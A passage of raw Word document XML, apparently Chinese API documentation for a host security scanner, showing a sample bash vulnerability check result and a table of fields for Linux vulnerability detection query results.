        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "condition": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>appVersion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "bash＜4.3\r\n (不同操作系统影响的应用版本不同，具体以检测结果为准)",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pocCheckResults</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>executeType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>checkResult</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "- bash\r\n  当前安装版本：3.2-24.el5\r\n  漏洞修复版本：3.2-33.el5_11.4\r\n该主机存在此漏洞"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>executeType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>checkResult</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "当前主机存在漏洞，在/dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>目录中发现</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Poc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>生成的文件/dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/QT_Test_1558287004"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B1F9E0"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910"/>
        <w:gridCol w:w="1072"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="5555"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="343A265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7CBCEE7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10CD6D88" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33EFA651" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BCC35D7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1912F5B7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35DE8C89" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vulId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35C239F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="773581AD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5ABCD3B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险id（仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="46A32771" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="076925FB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vulName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67E2C002" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00ED04EA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FE245F9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险名（仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="04E9B367" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C2CF20D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="634ED6B4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="628FAC80" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CD9A708" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>影响的应用（仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="08522C42" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14943390" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>desc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="148AD72F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D6DDE92" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4096)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B005F3A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7AAFCAD1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5378A0F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>restartOpts</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55C30388" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="356B6B46" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74FF215C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>修复影响：0-未知；1-无需重启；2-服务重启；3系统重启 （仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0900218A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4504B2A1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>publicDate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6045AA52" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BA3F1D7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B81AE15" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>发布时间（仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6F20100F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="651370AA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>firstCheckTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35D6192D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7190B101" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56E37583" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>首次检测时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="54C5E854" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C14F7C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>family</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B715499" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15C72EE0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="155E112F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险类型，对于漏洞检测固定为4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6F3E356E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="476EB775" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D80CE47" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="517684A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4ACB2B05" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>危险程度：0-信息；1-低危；2-中危；3-高危；4-危急 ）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0FE0DBC4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4094BC44" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>checkInfo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2507478F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2350FE09" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="752E64E0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>验证信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4B6CF247" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="405BA161" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pocCheckInfo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="164AE267" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51DC4CED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B801331" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>POC检测信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="666664CF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D975F77" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>checkResult</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2336319F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="711A6EFC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E20ABAA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>验证结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1B938E04" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0136410E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="196A6020" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20F65B48" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2618AC37" w14:textId="3837F7ED" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>详情，见</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:instrText>HYPERLINK \l "附录3-linux漏洞检测-查询结果-data数据结构" \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:t>附录3</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="255514FA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06BBEAFD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>remedDescription</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7232983A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A06E6FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15D84829" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>修复建议</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7EC1D018" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C128A9E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hasExp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
